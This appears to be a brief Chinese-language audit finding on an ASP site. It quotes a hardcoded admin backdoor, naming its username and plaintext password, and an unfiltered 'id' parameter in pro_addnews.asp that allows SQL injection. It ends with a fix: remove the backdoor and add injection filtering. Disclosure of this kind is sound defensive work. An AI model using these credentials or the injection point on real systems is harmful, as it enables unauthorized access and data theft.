If ytss_use <> "" And ytss_Pword <> "" Then if ytss_use="lty696" and md5(ytss_Pword)="ae68b0f59186f263" then Session("admin_User") = "lty" session("admin_type") = "lty696" Response.Redirect "tz_admin_index.asp" //很明显的后门,用户名为lty696 密码:841122

pro_addnews.asp

代码如下

id=trim(request.QueryString("id")) if request.QueryString("action")="modi" and id<>"" then dim modi modi="y" set rsok=server.createobject("adodb.recordset") sqlok="select * from product where id="&cint(trim(request.QueryString("id"))) rsok.open sqlok,conn,1,1 //对ID未进行过滤直接提交数据库查询造成注入

修复方案:

删除后门代码,添加防注入程序